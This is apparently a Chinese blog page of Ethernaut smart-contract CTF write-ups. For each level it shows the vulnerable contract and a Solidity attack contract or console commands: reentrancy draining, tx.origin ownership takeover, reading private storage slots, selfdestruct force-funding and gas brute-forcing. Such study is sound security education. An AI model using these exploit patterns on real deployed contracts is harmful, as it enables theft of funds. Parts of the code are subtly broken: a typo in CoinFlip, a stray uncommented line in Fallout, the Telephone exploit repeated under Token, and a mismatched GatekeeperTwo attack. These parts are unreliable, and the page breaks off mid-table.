<!DOCTYPE html><html lang="zh-Hans"> <head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>以太航员挑战 | 沉于思，录以隙</title><meta name="description" content="# 控制台用法 await contract：显示当前关卡所有可用方法 看slot内容 ```solidity await web3.eth.getStorageAt(&#34;0x3b5520d524eEB80ad38BdC961cDFfAB7fa62bBcE&#34;, 0) ``` DEX"><link rel="icon" type="image/svg+xml" href="/favicon.svg"><link rel="preconnect" href="https://fonts.googleapis.com"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link href="https://fonts.googleapis.com/css2?family=Playfair+Display:wght@400;500;600;700&family=Zhi+Mang+Xing&family=Noto+Serif+SC:wght@400;500;700&family=Inter:wght@400;500;600&display=swap" rel="stylesheet"><script>
      (() => {
        try {
          const saved = localStorage.getItem("theme");
          const theme = saved === "dark" || saved === "light"
            ? saved
            : (window.matchMedia("(prefers-color-scheme: dark)").matches ? "dark" : "light");
          document.documentElement.setAttribute("data-theme", theme);
        } catch {
          document.documentElement.setAttribute("data-theme", "light");
        }
      })();
    </script><link rel="stylesheet" href="/_astro/_folder_.DyRfo8ex.css"></head> <body class="is-post-page"> <div class="page-shell"> <header class="topbar"> <a class="brand" href="/">沉于思，录以隙</a> <nav class="nav-links"> <a href="/" class>首页</a> <a href="/folders" class>目录</a> <a href="/tags" class>标签</a> <button id="theme-toggle" type="button" aria-label="切换主题"> <span class="theme-icon theme-sun">☀</span> <span class="theme-icon theme-moon">☾</span> </button> </nav> </header> </div> <main id="main-content" class="page-shell page-main is-post-main">  <article class="article-shell"> <a class="back-link" href="/">&larr; 返回首页花园</a> <header class="article-header"> <div class="article-directory"> <a href="/folders" class="directory-link">目录</a>  <span class="directory-sep">/</span> <a href="/folders/web3/" class="directory-link">web3</a>   <span class="directory-sep">/</span> <span class="directory-text">合约审计</span>  </div> <p class="eyebrow">2026/4/15</p> <h1>以太航员挑战</h1> <p class="lead"># 控制台用法 await contract：显示当前关卡所有可用方法 看slot内容 ```solidity await web3.eth.getStorageAt(&quot;0x3b5520d524eEB80ad38BdC961cDFfAB7fa62bBcE&quot;, 0) ``` DEX</p>  <div class="tag-row" style="justify-content: center; margin-bottom: 24px;">  </div> <p class="source-note">来源路径：web3/合约审计/以太航员挑战.md</p> </header> <div class="article-layout"> <div class="article-main"> <div class="article-content"><h1>控制台用法</h1><p>await contract：显示当前关卡所有可用方法</p>
<p>看slot内容</p>
<pre><code class="language-solidity">await web3.eth.getStorageAt(&quot;0x3b5520d524eEB80ad38BdC961cDFfAB7fa62bBcE&quot;, 0)
</code></pre>
<p>DEX关卡较多使用控制台，可参考</p>
<h1>fallback</h1><pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Fallback {
    mapping(address =&gt; uint256) public contributions;
    address public owner;

    constructor() {
        owner = msg.sender;
        contributions[msg.sender] = 1000 * (1 ether);
    }

    modifier onlyOwner() {
        require(msg.sender == owner, &quot;caller is not the owner&quot;);
        _;
    }

    function contribute() public payable {
        require(msg.value &lt; 0.001 ether);
        contributions[msg.sender] += msg.value;
        if (contributions[msg.sender] &gt; contributions[owner]) {
            owner = msg.sender;
        }
    }

    function getContribution() public view returns (uint256) {
        return contributions[msg.sender];
    }

    function withdraw() public onlyOwner {
        payable(owner).transfer(address(this).balance);
    }

    receive() external payable {
        require(msg.value &gt; 0 &amp;&amp; contributions[msg.sender] &gt; 0);
        owner = msg.sender;
    }
}
</code></pre>
<ul>
<li><code>contributions</code>: 记录每个地址向合约“贡献”的金额（单位为 wei，因为 <code>msg.value</code> 是 wei）。</li>
<li>构造函数把部署者 <code>owner</code> 设为 <code>msg.sender</code>，并把部署者的 <code>contributions</code> 设为 <code>1000 * (1 ether)</code>（看起来像意图给予初始高贡献）。</li>
<li><code>contribute()</code>：允许外部地址发送小额资金（必须小于 0.001 ether）并把该值累加到 <code>contributions</code>。若该地址的累计贡献超过当前 <code>owner</code> 的贡献值，则把 <code>owner</code> 改为该地址。</li>
<li><code>getContribution()</code>：返回调用者自己的贡献。</li>
<li><code>withdraw()</code>：只有 <code>owner</code> 可调用，把合约所有余额发给 <code>owner</code>（使用 <code>.transfer</code>）。</li>
<li><code>receive()</code>：合约接收到直接转账（无 calldata）时执行；要求 <code>msg.value &gt; 0</code> 且 <code>contributions[msg.sender] &gt; 0</code>，然后把 <code>owner = msg.sender</code>。</li>
</ul>
<h2 id="section-1">思路</h2><pre><code class="language-solidity">contract.contribute({value: 1}) //首先使贡献值大于0
contract.sendTransaction({value: 1}) //触发receive函数
contract.withdraw() //将合约的balance清零
</code></pre>
<p>关键在receive函数，</p>
<p>EVM 如何用 calldata 判断调用哪个函数？</p>
<p>合约收到交易时，EVM 会：</p>
<ol>
<li>读取 calldata 前 4 字节；</li>
<li>查表看合约中是否有匹配的函数选择器；</li>
<li>✅ 有匹配 → 调用该函数；</li>
<li>❌ 没匹配：<ul>
<li>若有 <code>receive()</code> 且 calldata 长度为 0 → 调用 <code>receive()</code>；</li>
<li>否则若有 <code>fallback()</code> → 调用 <code>fallback()</code>；</li>
<li>否则 → revert。</li>
</ul>
</li>
</ol>
<p>这就是为什么：</p>
<pre><code class="language-solidity">contract.contribute({value: 1})
</code></pre>
<p>会执行 <code>contribute()</code>（因为有匹配的函数选择器），<br>而</p>
<pre><code class="language-solidity">signer.sendTransaction({to: contract.address, value: 1})
</code></pre>
<p>没有任何 calldata（data 字段为空），于是触发了 <code>receive()</code>。</p>
<h1>fallout</h1><pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import &quot;openzeppelin-contracts-06/math/SafeMath.sol&quot;;

contract Fallout {
    using SafeMath for uint256;
//把  SafeMath  库里所有 以 uint256 作为第一个参数 的函数，“挂”到  uint256  类型
之后写  x.add(y)  就能自动转成  SafeMath.add(x, y) ，防止加减乘除溢出。

    mapping(address =&gt; uint256) allocations;
    address payable public owner;

    /* constructor */
    function Fal1out() public payable {
        owner = msg.sender;
        allocations[owner] = msg.value;
    }

    modifier onlyOwner() {
        require(msg.sender == owner, &quot;caller is not the owner&quot;);
        _;
    }

    function allocate() public payable {
        allocations[msg.sender] = allocations[msg.sender].add(msg.value);
    }

    function sendAllocation(address payable allocator) public {
        require(allocations[allocator] &gt; 0);
        allocator.transfer(allocations[allocator]);
    }

    function collectAllocations() public onlyOwner {
        msg.sender.transfer(address(this).balance);
    }

    function allocatorBalance(address allocator) public view returns (uint256) {
        return allocations[allocator];
    }
}
</code></pre>
<p>该关卡的要求是获取合约的owner</p>
<pre><code class="language-solidity">    /* constructor */
    function Fal1out() public payable {
        owner = msg.sender;
        allocations[owner] = msg.value;
    }
</code></pre>
<p>构造函数名称与合约名称不一致使其成为一个public类型的函数，即任何人都可以调用，同时在构造函数中指定了函数调用者直接为合约的owner，所以我们可以直接调用构造函数Fal1out来获取合约的ower权限。</p>
<h1>CoinFlip</h1><pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract CoinFlip {
    uint256 public consecutiveWins;
    uint256 lastHash;
    uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

    constructor() {
        consecutiveWins = 0;
    }

    function flip(bool _guess) public returns (bool) {
        uint256 blockValue = uint256(blockhash(block.number - 1));

        if (lastHash == blockValue) {
            revert();
        }

        lastHash = blockValue;
        uint256 coinFlip = blockValue / FACTOR;
        bool side = coinFlaip == 1 ? true : false;

        if (side == _guess) {
            consecutiveWins++;
            return true;
        } else {
            consecutiveWins = 0;
            return false;
        }
    }
}
</code></pre>
<p>抛硬币 游戏合约，<br>游戏逻辑（理想版）<br>用上一区块的哈希  blockhash(block.number-1)  做随机源<br>哈希除以一个大数  FACTOR ，把最高位挤出来当 0/1<br>猜对了  consecutiveWins++ ，猜错清零</p>
<p>但是blockhash可预测</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &#39;./CoinFlip.sol&#39;;

contract Hack {
    CoinFlip public immutable target;
    uint256 private constant FACTOR =
        57896044618658097711785492504343953926634992332820282019728792003956564819968;

    constructor(address _target) {
        target = CoinFlip(_target);
    }

    /// 必须在新区块里调用，否则 revert
    function attack() external {
        uint256 blockValue = uint256(blockhash(block.number - 1));
        require(blockValue != 0, &quot;block too early&quot;);

        uint256 coinFlip = blockValue / FACTOR;
        bool side = coinFlip == 1;

        target.flip(side);          // 百发百中
    }
}
</code></pre>
<h1>Telephone</h1><pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Telephone {
    address public owner;

    constructor() {
        owner = msg.sender;
    }

    function changeOwner(address _owner) public {
        if (tx.origin != msg.sender) {
            owner = _owner;
        }
    }
}
</code></pre>
<p>让msg.sender与tx.origin不相同即可，使用合约就可以实现。</p>
<ul>
<li><code>tx.origin</code> 是发起整个交易的外部账户（钱包地址）。</li>
<li><code>msg.sender</code> 是当前调用者（可能是合约或外部账户）。</li>
</ul>
<p>如果情景是直接由钱包调用合约，两者相同  ，但是如果是在多个合约的情况下，比如用户通过b合约来调用a合约，那么对于a合约来说，msg.sender就代表合约b，而tx.origin就代表用户钱包地址，所以我们这里需要另外部署一个合约来调用这儿的changeOwner：</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &#39;./Telephone.sol&#39;;

contract exp{
    Telephone public immutable target;
    address public owner;

    constructor(){
        owner = msg.sender;
  //在 Solidity 中，`msg.sender` 表示当前调用这个函数的实体；
 //所以这里 `msg.sender
//会是你的钱包地址；因此构造函数执行时，将部署者地址写入 owner
        target=Telephone(0x3d79CEeF1F3665587D4D20F1f2030C4aC097c1E9);//目标合约地址
    }

    function attack() public {
        target.changeOwner(owner);
    }

}
</code></pre>
<h1>Token 整数溢出</h1><pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Token {
    mapping(address =&gt; uint256) balances;
    uint256 public totalSupply;

    constructor(uint256 _initialSupply) public {
        balances[msg.sender] = totalSupply = _initialSupply;
    }

    function transfer(address _to, uint256 _value) public returns (bool) {
        require(balances[msg.sender] - _value &gt;= 0);
        balances[msg.sender] -= _value;
        balances[_to] += _value;
        return true;
    }

    function balanceOf(address _owner) public view returns (uint256 balance) {
        return balances[_owner];
    }
}
</code></pre>
<p>整数溢出因为是uint的，负数就直接是下溢了。</p>
<p>转账地址随便填就行，只要不是自己就行，否则就加一次减一次回来了。</p>
<p>查看自己的余额await contract.balanceOf(player)).toNumber()</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &#39;./Telephone.sol&#39;;



contract exp{
    Telephone public immutable target;
    address public owner;

    constructor(){
        owner = msg.sender;
        target=Telephone(0x3d79CEeF1F3665587D4D20F1f2030C4aC097c1E9);//目标合约地址
    }

    function attack() public {
        target.changeOwner(owner);
    }
}
</code></pre>
<h1>Delegation 代理机制</h1><pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Delegate {
    address public owner;

    constructor(address _owner) {
        owner = _owner;
    }

    function pwn() public {
        owner = msg.sender;
    }
}

contract Delegation {
    address public owner;
    Delegate delegate;

    constructor(address _delegateAddress) {
        delegate = Delegate(_delegateAddress);
        owner = msg.sender;
    }

    fallback() external {
        (bool result,) = address(delegate).delegatecall(msg.data); 
        if (result) {
            this;//this 是一个表达式，表示当前合约地址
        }
    }
}
</code></pre>
<p><code>(bool result,) = address(delegate).delegatecall(msg.data);</code></p>
<ul>
<li><code>address(delegate)</code>：将合约实例 <code>delegate</code> 转换为纯地址类型；</li>
<li><code>.delegatecall(...)</code>：执行目标合约的代码（但在当前合约的上下文中）；</li>
<li><code>msg.data</code>：外部调用传入的原始数据（包括函数选择器和参数）；</li>
<li>返回值是一个 <code>(bool success, bytes memory returndata)</code>，所以我们写成 <code>(bool result,)</code> 仅接收第一个布尔结果。</li>
</ul>
<pre><code class="language-solidity">await contract.sendTransaction({ data: web3.utils.sha3(&quot;pwn()&quot;).slice(0,10), gas:100000 });
</code></pre>
<ul>
<li><code>web3.utils.sha3(&quot;pwn()&quot;)</code>：计算字符串 <code>&quot;pwn()&quot;</code> 的 Keccak-256 哈希（返回 <code>0x</code> 开头的 hex 字符串）。</li>
<li><code>.slice(0,10)</code>：取哈希的前 10 个字符，也就是 <code>&quot;0x&quot; + 前 8 个 hex 字符</code>，即函数 selector（4 字节）。例如得到 <code>0xdd365b8b</code>。</li>
</ul>
<h1>Force 自毁机制强制给钱</h1><pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Force { /*
                   MEOW ?
         /\_/\   /
    ____/ o o \
    /~____  =ø= /
    (______)__m_m)
                   */ }
</code></pre>
<p>不能用普通转账直接过关。原因是：目标合约 <code>Force</code> 没有 <code>receive()</code> 或 <code>fallback()</code></p>
<p>强行将以太币置入合约的相关方式：1. 自毁</p>
<p>通过自毁使合同余额大于零</p>
<p> 当一个合约被 <code>selfdestruct</code> 时，它可以<strong>强制把剩余余额发送</strong>到任何地址，无论目标合约是否可接收 ETH。  </p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract attack{
    constructor(address payable _target) payable {
        selfdestruct(_target);//部署时往 Exploit 附带 1 wei；
    }
}
</code></pre>
<h1>vault</h1><p>打开金库以通过关卡！</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Vault {
    bool public locked;
    bytes32 private password;

    constructor(bytes32 _password) {
        locked = true;
        password = _password;
    }

    function unlock(bytes32 _password) public {
        if (password == _password) {
            locked = false;
        }
    }
}
</code></pre>
<p><code>**private**</code>** 是 Solidity 的可见性关键字，只阻止合约间源码访问，并不加密或隐藏链上存储。  **</p>
<p><code>password</code> 虽然 <code>private</code>，但存在链上 storage 的 <code>slot</code> 可被任意读取 —— 直接读出 <code>password</code> 后调用 <code>unlock(password)</code> 即可解锁 <code>locked = false</code>。</p>
<pre><code class="language-solidity">// 假设 web3 注入，可在控制台用
await web3.eth.getStorageAt(&quot;0xC619ff8c4056A52c9C504B844D93bC3881Ac5A69&quot;, 0)
await web3.eth.getStorageAt(&quot;0xC619ff8c4056A52c9C504B844D93bC3881Ac5A69&quot;, 1)
</code></pre>
<h1>king 回滚机制永久占据位置</h1><p>合同代表一个非常简单的游戏：谁给它发送了比当前奖金还大的数量的以太，就成为新的国王。在这样的事件中，被推翻的国王获得了新的奖金，但是如果你提交的话那么合约就会回退，让level重新成为国王，而我们的目标就是阻止这一情况的发生。</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract King {
    address king;
    uint256 public prize;
    address public owner;

    constructor() payable {
        owner = msg.sender;
        king = msg.sender;
        prize = msg.value;
    }

    receive() external payable {
        require(msg.value &gt;= prize || msg.sender == owner);
        payable(king).transfer(msg.value);
        king = msg.sender;
        prize = msg.value;
    }

    function _king() public view returns (address) {
        return king;
    }
}
</code></pre>
<p>从上面的代码中可以看到当国王被推翻时国王将会获得奖金，那么只要国王拒绝接受奖金就可以一直是国王。</p>
<p>我们可以部署以下攻击合约,当原智能合约有新的king诞生时会向我们的合约退还之前的奖金，但是攻击合约不接收，直接revert()那么就可以永远占据合约的king不放：</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract attack{

    function hack(address target) external payable {
        (bool ok, ) = target.call{ value: msg.value }(&quot;&quot;);
        require(ok, &quot;call failed&quot;);
    }

}
左侧编译并部署 attack（Deploy 时 Value 留空，不能给合约部署钱否则失败。
在右侧 Run 面板上方 Value 输入框填 0.0011（或 wei 值 1100000000000000），单位选 ether（或选 wei 并填 wei）。
下方从已部署合约实例中选中 attack（确保是你刚部署那个地址）。。
</code></pre>
<h1>Re-entrance 重入攻击（回调）</h1><p>此关卡的目标是让你从合约中窃取所有资金。</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.6.12;

import &quot;openzeppelin-contracts-06/math/SafeMath.sol&quot;;

contract Reentrance {
    using SafeMath for uint256;

    mapping(address =&gt; uint256) public balances;

    function donate(address _to) public payable {
        balances[_to] = balances[_to].add(msg.value);
    }

    function balanceOf(address _who) public view returns (uint256 balance) {
        return balances[_who];
    }

    function withdraw(uint256 _amount) public {
        if (balances[msg.sender] &gt;= _amount) {
            (bool result,) = msg.sender.call{value: _amount}(&quot;&quot;);
            if (result) {
                _amount;
            }
            balances[msg.sender] -= _amount;
        }
    }

    receive() external payable {}
}
</code></pre>
<p>重点来看withdraw函数，我们可以看到它接收了一个_amount参数，将其与发送者的balance进行比较，不超过发送者的balance就将这些_amount发送给sender，同时我们注意到这里它用来发送ether的函数是call.value,发送完成后，它才在下面更新了sender的balances，这里就是可重入攻击的关键所在了，因为该函数在发送ether后才更新余额，所以我们可以想办法让它卡在call.value这里不断给我们发送ether</p>
<ul>
<li>在重入攻击中，victim 合约在 <code>withdraw()</code> 里先把钱 <code>call</code> 给 <code>msg.sender</code>（外部合约），这会触发 <code>msg.sender</code> 的 <code>receive()</code> —— <strong>这就是回调</strong>。</li>
<li>攻击合约的 <code>receive()</code> 会在回调里<strong>再次调用 victim.withdraw(...)</strong>，因为 victim 还没更新自己的状态，所以可以重复拿钱 → 重入成功。</li>
</ul>
<p>gas设置5000000</p>
<ul>
<li><strong>重入会多次内联调用（回调→再次 withdraw）</strong>，每次调用消耗 gas；必须留出足够 gas 以支持多轮回调。</li>
<li>如果 gas 太低，交易会在某一轮回调中耗尽并 revert（攻击失败）。</li>
</ul>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.6.12;

import &quot;./Reentrance.sol&quot;;

interface IVictim {
    function donate(address _to) external payable;
    function withdraw(uint256 _amount) external;
    function balanceOf(address _who) external view returns (uint256);
}

contract Attacker {
    IVictim public victim;
    address payable public owner;
    uint256 public withdrawAmount;

    constructor() public {
        victim = IVictim(0x58Df09801b6f1Cf14bF172D391B631B1E4f6DCAd);
        owner = msg.sender;
    }

    // 存款并立即发起 withdraw（开始重入）
    function donateAndAttack() external payable {
        require(msg.value &gt; 0, &quot;send ETH&quot;);
        // 把钱捐给 victim，使 victim.balances[this] = msg.value
        victim.donate{ value: msg.value }(address(this));
        withdrawAmount = msg.value;
        // 发起首次 withdraw，之后 receive() 会在回调里再次调用 withdraw
        victim.withdraw(withdrawAmount);
    }

    // 当 victim 转钱给本合约时，这里会被触发 —— 在这里重入 victim.withdraw(...)
    receive() external payable {
        uint256 victimBal = address(victim).balance;
//用的是合约的余额，如果是balances[msg.sender]会一直循环导致gas耗尽回滚交易
        if (victimBal &gt;= withdrawAmount) {
            // 只要 victim 还有钱，就继续重入提取
            victim.withdraw(withdrawAmount);
        } else {
            // 偷够了，把钱发回给 attacker EOA
            owner.transfer(address(this).balance);
        }
    }

    // 辅助函数：把偷到的钱取回
    function collect() external {
        require(msg.sender == owner, &quot;only owner&quot;);
        owner.transfer(address(this).balance);
    }
}
</code></pre>
<h1>**Elevator  不可信外部调用  **</h1><p>这个电梯似乎并不会让你到达顶层</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface Building {
    function isLastFloor(uint256) external returns (bool);
}

contract Elevator {
    bool public top;
    uint256 public floor;

    function goTo(uint256 _floor) public {
        Building building = Building(msg.sender);

        if (!building.isLastFloor(_floor)) {
            floor = _floor;
            top = building.isLastFloor(floor);
        }
    }
}
</code></pre>
<p><code>Building building = Building(msg.sender);</code><br>这只是<strong>把地址当成实现了 <strong><code>**Building**</code></strong> 接口的合约来调用</strong>（类型转换/视图），并不会在编译或运行时检查该地址确实实现了这个接口。  </p>
<p><code>building.isLastFloor(_floor)</code> 在字节码层面是 <strong>对 <strong><code>**msg.sender**</code></strong> 的一次外部 CALL</strong>：</p>
<ul>
<li>EVM 构造 calldata（selector + 参数）并发给 <code>msg.sender</code>（也就是发起调用的合约/EOA的地址）。</li>
<li>如果 <code>msg.sender</code> 是合约且实现了该 selector，就会执行那个合约对应的函数逻辑并返回任意 <code>bool</code>。</li>
</ul>
<p>让 <code>msg.sender</code> 是一个恶意合约，这个合约的 <code>isLastFloor</code> 在**第一次被调用时返回 <strong><code>**false**</code>（允许进入 <code>if</code>），但在</strong>第二次被调用时返回 **<code>**true**</code>，从而让 <code>Elevator</code> 把 <code>top</code> 设为 <code>true</code>。</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;./elevator.sol&quot;;

contract AttackElevator {
    bool private firstCall = true;

    function isLastFloor(uint256) external returns (bool) {
        if (firstCall) {
            firstCall = false;
            return false;
        } else {
            return true;
        }
    }

    // trigger the Elevator.goTo; msg.sender will be this contract
    function attack(address elevatorAddr, uint256 _floor) external {
        Elevator(elevatorAddr).goTo(_floor);
    }
}
</code></pre>
<h1>Privacy</h1><p>这份合约的创建者足够谨慎，保护了其存储中的敏感区域。解锁此合约即可通关。</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Privacy {
    bool public locked = true;
    uint256 public ID = block.timestamp;
    uint8 private flattening = 10;
    uint8 private denomination = 255;
    uint16 private awkwardness = uint16(block.timestamp);
    bytes32[3] private data;

    constructor(bytes32[3] memory _data) {
        data = _data;
    }

    function unlock(bytes16 _key) public {
        require(_key == bytes16(data[2]));
        locked = false;
    }

    /*
    A bunch of super advanced solidity algorithms...

      ,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`
      .,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,
      *.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^         ,---/V\
      `*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.    ~|__(o.o)
      ^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;^`*.,*&#39;  UU  UU
    */
}
</code></pre>
<pre><code class="language-solidity">    bool public locked = true; //slot1
    uint256 public ID = block.timestamp;//2
    uint8 private flattening = 10;
    uint8 private denomination = 255;
    uint16 private awkwardness = uint16(block.timestamp);//合并成slot3
    bytes32[3] private data;
</code></pre>
<h1>gatekeeper one</h1><p>通过门卫并注册为参赛者即可通过此关卡。</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract GatekeeperOne {
    address public entrant;

    modifier gateOne() {
        require(msg.sender != tx.origin);
        _;
    }

    modifier gateTwo() {
        require(gasleft() % 8191 == 0);
        _;
    }

    modifier gateThree(bytes8 _gateKey) {
        require(uint32(uint64(_gateKey)) == uint16(uint64(_gateKey)), &quot;GatekeeperOne: invalid gateThree part one&quot;);
        require(uint32(uint64(_gateKey)) != uint64(_gateKey), &quot;GatekeeperOne: invalid gateThree part two&quot;);
        require(uint32(uint64(_gateKey)) == uint16(uint160(tx.origin)), &quot;GatekeeperOne: invalid gateThree part three&quot;);
        _;
    }

    function enter(bytes8 _gateKey) public gateOne gateTwo gateThree(_gateKey) returns (bool) {
        entrant = tx.origin;
        return true;
    }
}
</code></pre>
<p> 当一个函数有多个 <code>modifier</code> 时，执行顺序 <strong>从左到右依次嵌套</strong>。  </p>
<p>enter需要满足gateOne、gateTwo、gateThree三个修饰器的检查条件</p>
<p>1、gateOne ：这个通过部署一个中间恶意合约即可绕过 </p>
<p>2、gateTwo ：这里的msg.gas 指的是运行到当前指令还剩余的 gas 量，要能整除 8191。那我们只需要 8191+x ，x 为从开始到运行完 msg.gas 所消耗的 gas。通过查阅资料发现msg.gas在文档里的描述是remaining gas，在Javascript VM环境下进行Debug可在Step detail 栏中可以看到这个变量</p>
<p>3、gateThree() 也比较简单，将 tx.origin 倒数三四字节换成 0000 即可。bytes8(tx.origin) &amp; 0xFFFFFFFF0000FFFF 即可满足条件。</p>
<p>我的eoa地址</p>
<p>0xde3d99ec73f3ce95f0634424245ed68b01ebd2a2</p>
<pre><code class="language-solidity"> require(uint32(uint64(_gateKey)) == uint16(uint160(tx.origin)), &quot;GatekeeperOne: invalid gateThree part three&quot;);
        _;
</code></pre>
<p>uint32 key : 00 00 d2 a2</p>
<pre><code class="language-solidity">require(uint32(uint64(_gateKey)) != uint64(_gateKey)
</code></pre>
<p>uint64 key : 24 5e d6 8b 00 00 d2 a2</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import &#39;./Gatekeeper One.sol&#39;;

contract GatekeeperOneAttack {

    function attack(address _target) public {
        IGatekeeperOne gate = IGatekeeperOne(_target);
        bytes8 key = bytes8(uint64(uint160(tx.origin))) &amp; 0xFFFFFFFF0000FFFF;
        for (uint256 i = 0; i &lt; 300; i++) {
            try gate.enter{gas: 8191 * 10 + i}(key) {
                break;
            } catch {}
        }
    }
}
</code></pre>
<h1>gatekeeper two</h1><p>注册成为参赛者以通过此关卡</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract GatekeeperTwo {
    address public entrant;

    modifier gateOne() {
        require(msg.sender != tx.origin);
        _;
    }

    modifier gateTwo() {
        uint256 x;
        assembly {
            x := extcodesize(caller())
        }
        require(x == 0);
        _;
    }

    modifier gateThree(bytes8 _gateKey) {
        require(uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(_gateKey) == type(uint64).max);
        _;
    }

    function enter(bytes8 _gateKey) public gateOne gateTwo gateThree(_gateKey) returns (bool) {
        entrant = tx.origin;
        return true;
    }
}
</code></pre>
<p>1、gateOne ：这个通过部署一个中间恶意合约即可绕过 </p>
<p>2、gateTwo ：<code>extcodesize(addr)</code> 返回地址 <code>addr</code> 上的合约代码大小（字节数）。</p>
<ul>
<li>对于 EOA（外部账户）该值为 0。</li>
<li>对于已部署的合约该值通常 &gt; 0。</li>
</ul>
<p>因此这条 <code>require(x == 0)</code> 的意图通常是“<strong>只允许外部账户调用</strong>，<strong>不允许普通合约调用</strong>”。<br>但有个例外：<strong>合约在其构造函数执行期间，本地址的代码还没有写入链上</strong>，所以 <code>extcodesize(address_of_this_contract)</code> 在构造阶段会返回 <code>0</code>。这是 EVM 的一个特性，也是常见的绕过手段。</p>
<p>3、gateThree() 一步步转换类型即可</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import &#39;./Gatekeeper One.sol&#39;;

contract GatekeeperOneAttack {
    constructor(address gatekeeperAddress) {
        IGatekeeperOne gate = IGatekeeperOne(gatekeeperAddress);
        // 如果 gateThree 的校验是： uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(_gateKey) == type(uint64).max
        // 那么要生成 key = ~uint64(bytes8(keccak256(abi.encodePacked(msg.sender))))
        // 在这里 msg.sender 对目标合约来说就是 address(this)（攻击合约）
        bytes8 h = bytes8(keccak256(abi.encodePacked(address(this))));
        uint64 hv = uint64(h);
        uint64 keyNum = hv ^ type(uint64).max; // 或者: ~hv
        bytes8 key = bytes8(keyNum);
        // 直接在 constructor 中调用目标合约
        gate.enter(key);
    }
}
</code></pre>
<h1>Naught Coin ERC20代币</h1><p>NaughtCoin是一种ERC20代币，而你已经持有了所有的代币。问题在于，你只能在10年的锁定期结束后才能转移它们。你能想办法把代币转到另一个地址，以便自由转移吗？将你的代币余额降至0即可完成此关卡。</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;openzeppelin-contracts-08/token/ERC20/ERC20.sol&quot;;

contract NaughtCoin is ERC20 {
    // string public constant name = &#39;NaughtCoin&#39;;
    // string public constant symbol = &#39;0x0&#39;;
    // uint public constant decimals = 18;
    uint256 public timeLock = block.timestamp + 10 * 365 days;
    uint256 public INITIAL_SUPPLY;
    address public player;

    constructor(address _player) ERC20(&quot;NaughtCoin&quot;, &quot;0x0&quot;) {
        player = _player;
        INITIAL_SUPPLY = 1000000 * (10 ** uint256(decimals()));
        // _totalSupply = INITIAL_SUPPLY;
        // _balances[player] = INITIAL_SUPPLY;
        _mint(player, INITIAL_SUPPLY);
        emit Transfer(address(0), player, INITIAL_SUPPLY);
    }

    function transfer(address _to, uint256 _value) public override lockTokens returns (bool) {
        super.transfer(_to, _value);
    }

    // Prevent the initial owner from transferring tokens until the timelock has passed
    modifier lockTokens() {
        if (msg.sender == player) {
            require(block.timestamp &gt; timeLock);
            _;
        } else {
            _;
        }
    }
}
</code></pre>
<p>要理解这一层次，我们必须了解什么是<a href="https://ethereum.org/en/developers/docs/standards/tokens/erc-20/">ERC20</a>代币标准。它是一种代币应用程序接口（API），定义了某些标准函数调用、参数和事件，任何打算创建ERC20代币的人都必须遵循这些标准。这使得所有使用这些代币的开发者能更轻松地预测其用途和交互方式。</p>
<p>要将代币转出我们的账户，我们本可以调用<code>transfer()</code>函数，但由于它使用了一个检查时间锁定期的修饰符，我们无法这样做。</p>
<p>这就是ERC20知识的用武之地。将代币转出合约有多种方式。<code>transfer()</code>函数是其中一种方法，另一种是<code>approve()</code>和<code>transferFrom()</code>。</p>
<table>
<thead>
<tr>
<th>步骤</th>
<th>函数</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>1</td>
<td><code>approve(spender, amount)</code></td>
<td>授权 spender 可转你的代币</td>
</tr>
<tr>
<td>2</td>
<td><code>transferFrom(player, to, amount)</code></td>
